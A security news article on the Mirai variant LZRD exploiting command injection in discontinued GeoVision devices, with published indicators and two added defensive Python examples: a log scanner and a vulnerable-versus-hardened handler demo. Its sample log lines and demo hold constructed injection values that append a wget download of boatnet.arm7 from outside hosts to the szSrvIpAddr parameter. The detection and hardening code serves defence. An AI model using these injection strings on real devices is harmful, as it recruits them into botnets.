A Growing Menace: Mirai Malware Evolves Amid Rising IoT Vulnerabilities
In a concerning turn of events, cybersecurity researchers at Akamai have confirmed the first active exploitation of two critical command injection vulnerabilities, CVE-2024-6047 and CVE-2024-11120, affecting discontinued GeoVision IoT devices. This campaign, detected via Akamai's global honeypots in April 2025, is a stark reminder that unsupported IoT hardware remains a silent threat within many networks.
These vulnerabilities were originally disclosed in 2024, but only now have they been weaponized in the wild. At the core of the attack lies a simple yet devastating vector: unsanitized input on the /DateSetting.cgi endpoint, allowing unauthenticated attackers to execute remote commands without any user interaction. The malware payload is a revamped Mirai variant dubbed "LZRD", aimed at building a large botnet capable of large-scale DDoS attacks.
This wave of exploitation is far from isolated. It forms part of a broader offensive targeting a range of obsolete IoT devices, including known flaws in ZTE routers, DigiEver systems, and Hadoop YARN. These attacks reinforce the cybersecurity community's growing concern: legacy IoT hardware, often unmonitored and unpatched, is the low-hanging fruit for today's cyber adversaries.
The Story Unfolded: Key Developments at a Glance
Akamai SIRT has identified active exploitation of two command injection flaws: CVE-2024-6047 and CVE-2024-11120.
Attacks began surfacing through honeypots in April 2025, nearly a year after the vulnerabilities were publicly disclosed.
The exploits target the /DateSetting.cgi endpoint on outdated GeoVision IoT devices.
The vulnerability in question allows remote attackers to run arbitrary system commands via the szSrvIpAddr parameter, with no need for authentication.
Threat actors deploy a new Mirai-based malware variant named LZRD, mainly affecting ARM-based devices.
Once executed, LZRD performs standard Mirai-style attacks, such as UDP floods, TCP SYN floods, and custom DDoS modules.
The malware includes hard-coded command-and-control (C2) IPs, indicating centralized orchestration.
C2 banners link the campaign to older TBOTNET infrastructure, signaling a resurgence and adaptation of long-standing botnets.
The campaign also exploits other known flaws, including:
Hadoop YARN bugs
CVE-2018-10561 in ZTE ZXV10 H108L routers
Legacy DigiEver vulnerabilities
Akamai's analysis stresses that attackers aim to hijack as many unpatched devices as possible to expand their botnet network.
GeoVision has confirmed the affected devices are discontinued and will not receive patches.
Security experts urge affected organizations to retire unsupported hardware immediately.
In cases where decommissioning isn't feasible, network-level defenses and IOC-based monitoring are vital.
Akamai continues to monitor the botnetâs activity and has shared a list of Indicators of Compromise (IOCs).
The C2 IPs and domains include:
`209.141.44.28`
`connect.antiwifi.dev`
And multiple SHA256 hashes of malicious binaries
The malware has been observed under filenames such as boatnet.arm7, a hallmark of Miraiâs evolving attack arsenal.
The ongoing campaign reiterates a critical cybersecurity lesson: old IoT tech never truly dies, it just gets recruited.
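The IOC-based monitoring recommended above can be scripted against web-server or honeypot access logs. The Python below is an added example, not Akamai's tooling or anything from GeoVision: the /DateSetting.cgi path, the szSrvIpAddr parameter, the C2 IP, the C2 domain and the boatnet.arm7 filename come from the indicators listed above, while the log lines are constructed, the dropper host in the second constructed line (the listed C2 IP) is an assumption, and the architecture suffixes beyond arm7 are assumed from common Mirai build naming. It flags any /DateSetting.cgi request whose szSrvIpAddr value carries shell metacharacters, and separately matches the published indicators anywhere in the line, so a request that injects via a different parameter but fetches a known binary still surfaces.

```python
"""Flag GeoVision /DateSetting.cgi injection attempts and LZRD/Mirai IOCs in
combined-format access logs. Added example, not Akamai's or GeoVision's code."""
import re
from urllib.parse import unquote_plus, urlsplit

# Indicators from Akamai's published list, as reproduced above.
C2_IPS = {"209.141.44.28"}
C2_DOMAINS = {"connect.antiwifi.dev"}
# boatnet.arm7 is the observed name; the other suffixes are an assumption
# based on how Mirai builds are usually named per architecture.
MIRAI_NAME_RE = re.compile(r"\bboatnet\.(?:arm\d*|mips|mpsl|x86|sh4|ppc|m68k)\b")
# Characters that let a parameter value break out of a shell command string.
SHELL_META_RE = re.compile(r"[;|&`$\n]")
# Combined/common log format: client ident user [time] "request" status ...
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def query_values(form_encoded, name):
    """Decode a form-encoded string, splitting on '&' only (never ';', which
    is part of the payload we are looking for), and return values of `name`."""
    values = []
    for pair in form_encoded.split("&"):
        key, _, value = pair.partition("=")
        if unquote_plus(key) == name:
            values.append(unquote_plus(value))
    return values


def injected_params(target, body=""):
    """Return szSrvIpAddr values that carry shell metacharacters when the
    request targets /DateSetting.cgi; both query string and POST body are checked."""
    parts = urlsplit(target)
    if not parts.path.endswith("/DateSetting.cgi"):
        return []
    found = []
    for source in (parts.query, body):
        for value in query_values(source, "szSrvIpAddr"):
            if SHELL_META_RE.search(value):
                found.append(value)
    return found


def ioc_hits(text):
    """Return the set of known C2 addresses and Mirai binary names found in text."""
    lowered = text.lower()
    hits = {ip for ip in C2_IPS if ip in text}
    hits.update(d for d in C2_DOMAINS if d in lowered)
    hits.update(MIRAI_NAME_RE.findall(text))
    return hits


def scan_log(lines):
    """Return one alert dict per log line showing an injection attempt or a
    known indicator; lines that do not parse as access-log entries are skipped."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        payloads = injected_params(m["target"])
        iocs = ioc_hits(line)
        if payloads or iocs:
            alerts.append({
                "src": m["src"],
                "target": m["target"],
                "injection": payloads,
                "iocs": sorted(iocs),
            })
    return alerts


# Constructed log lines (RFC 5737 documentation addresses for clients).
# Using the listed C2 IP as the dropper host in line two is an assumption.
SAMPLE_LOG = [
    '203.0.113.7 - - [03/Apr/2025:10:14:22 +0000] '
    '"GET /DateSetting.cgi?szSrvIpAddr=192.0.2.10 HTTP/1.1" 200 512',
    '198.51.100.9 - - [03/Apr/2025:10:15:01 +0000] '
    '"GET /DateSetting.cgi?szSrvIpAddr=1.1.1.1;wget%20http://209.141.44.28/boatnet.arm7 HTTP/1.1" 200 512',
    '198.51.100.9 - - [03/Apr/2025:10:15:03 +0000] '
    '"GET /DateSetting.cgi?szSrvIpAddr=%24(wget%20connect.antiwifi.dev) HTTP/1.1" 200 512',
    '192.0.2.44 - - [03/Apr/2025:10:16:40 +0000] "GET /index.html HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```

A legitimate time-server change (first constructed line) produces no alert, because the check keys on metacharacters rather than on the endpoint alone; that keeps the rule quiet on devices that are still administered through the same page.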
What Undercode Say:
The exploitation of CVE-2024-6047 and CVE-2024-11120 is a textbook case of a botnet resurgence fueled by long-abandoned tech. While these vulnerabilities were disclosed nearly a year ago, the reality is clear: awareness alone doesn't equal security. Countless organizations continue to operate on end-of-life (EOL) devices, either due to budgetary limitations or operational inertia. This complacency is precisely what cybercriminals bank on.
The usage of the /DateSetting.cgi endpoint as a gateway for system compromise reveals how even seemingly trivial endpoints can serve as critical entry points when input validation is neglected. The LZRD Mirai variant, although structurally similar to past iterations, shows refinements in coordination, modularity, and centralized control, emphasizing that botnets are evolving, not disappearing.
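The input-validation failure described above is the general shape of a CGI handler that splices a request parameter into a shell command. The Python below is an added example and is not GeoVision firmware code (which is not on this page): the parameter name szSrvIpAddr comes from the advisory, while the ntpdate command and the handler structure are assumptions. It places the vulnerable pattern beside a hardened one, shows how a POSIX shell would tokenise an injected value, and then validates the value as an IP address or RFC 1123 hostname and executes via an argv list so that no shell ever parses it.

```python
"""Vulnerable vs. hardened handling of a time-server parameter such as
GeoVision's szSrvIpAddr. Added example; ntpdate and the handler are assumptions."""
import ipaddress
import re
import shlex
import subprocess

# RFC 1123 hostname: 1-63 char labels of alphanumerics/hyphens, no label
# starting or ending with a hyphen, 253 chars overall.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
    r"(?:\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)


def build_command_unsafe(sz_srv_ip_addr):
    """Vulnerable pattern: the untrusted parameter is pasted into a string
    that is later handed to /bin/sh (system(3), popen, or shell=True)."""
    return f"ntpdate -u {sz_srv_ip_addr}"


def shell_tokens(command_string):
    """Tokenise a command string the way a POSIX shell would, so the effect
    of an injected ';' or '|' is visible without executing anything."""
    lexer = shlex.shlex(command_string, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    return list(lexer)


def is_valid_time_server(value):
    """Accept only a literal IPv4/IPv6 address or an RFC 1123 hostname."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return bool(HOSTNAME_RE.match(value))


def build_command_safe(sz_srv_ip_addr):
    """Hardened pattern: allow-list the value, then build an argv list so
    the value is a single argument and never passes through a shell."""
    if not is_valid_time_server(sz_srv_ip_addr):
        raise ValueError(f"rejected szSrvIpAddr value: {sz_srv_ip_addr!r}")
    return ["ntpdate", "-u", sz_srv_ip_addr]


def set_time_server(sz_srv_ip_addr, dry_run=True):
    """What the CGI handler should do: validate, then exec without a shell.
    With dry_run=True (the default here) the argv is returned, not run."""
    argv = build_command_safe(sz_srv_ip_addr)
    if not dry_run:
        subprocess.run(argv, check=True, timeout=30)  # shell=False by default
    return argv


if __name__ == "__main__":
    # Constructed hostile value in the style of a Mirai dropper one-liner.
    hostile = "1.1.1.1;wget http://203.0.113.50/boatnet.arm7"
    print("shell sees:", shell_tokens(build_command_unsafe(hostile)))
    for candidate in ("192.0.2.10", "pool.ntp.org", hostile):
        print(candidate, "->", is_valid_time_server(candidate))
```

The tokenised view is the whole bug in one line: the shell reads the value as "1.1.1.1", then a ";" that ends the ntpdate command, then a second command of the attacker's choosing. The hardened handler never reaches a shell, and its allow-list rejects the value before argv is even built, which is the check to add wherever a device exposes this kind of network-settings form.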
The reappearance of infrastructure previously tied to the TBOTNET family suggests that adversaries are repurposing reliable tactics and infrastructure, layering newer tools onto older playbooks. This kind of strategic adaptation is not just clever; it is also cost-effective and efficient. Threat actors don't need to develop entirely new malware when repackaging existing code proves just as effective.
Moreover, the fact that this campaign also targets other known IoT vulnerabilities, some dating back to 2018, underscores a systemic failure in IoT lifecycle management. Devices that are no longer supported by vendors but remain in use create blind spots in corporate defense systems. In this case, GeoVision has already declared the devices obsolete, making patching an impossibility.
This places defenders in a tight spot: either decommission or build network armor around inherently vulnerable gear. The problem is that many organizations don't have visibility into their full device inventory, let alone the capability to isolate legacy systems. That's where the Indicators of Compromise provided by Akamai become essential: they offer a tactical means to detect ongoing compromise even when strategic fixes aren't possible.
Cybersecurity isn't just about firewalls and zero trust; it's about knowing what's in your network and ensuring it's not a ticking time bomb. The exploit chain used here is not innovative, but it is effective, and effectiveness is all that matters to threat actors. Until organizations fully embrace IoT lifecycle hygiene, these kinds of botnet campaigns will continue to flourish.
Fact Checker Results:
The CVEs (2024-6047 and 2024-11120) are officially registered and tied to GeoVision device vulnerabilities.
Akamai
Mirai-based variants like LZRD have been observed in other ARM-targeting malware families since early 2025.
Prediction:
Expect continued growth in hybrid botnets targeting unpatched IoT hardware, with malware variants like LZRD evolving further. Without aggressive decommissioning of unsupported devices, this trend will persist well into 2026. Cybercrime groups will increasingly automate scanning for such vulnerabilities, folding them into larger malware-as-a-service operations.
References:
Reported By: cyberpress.org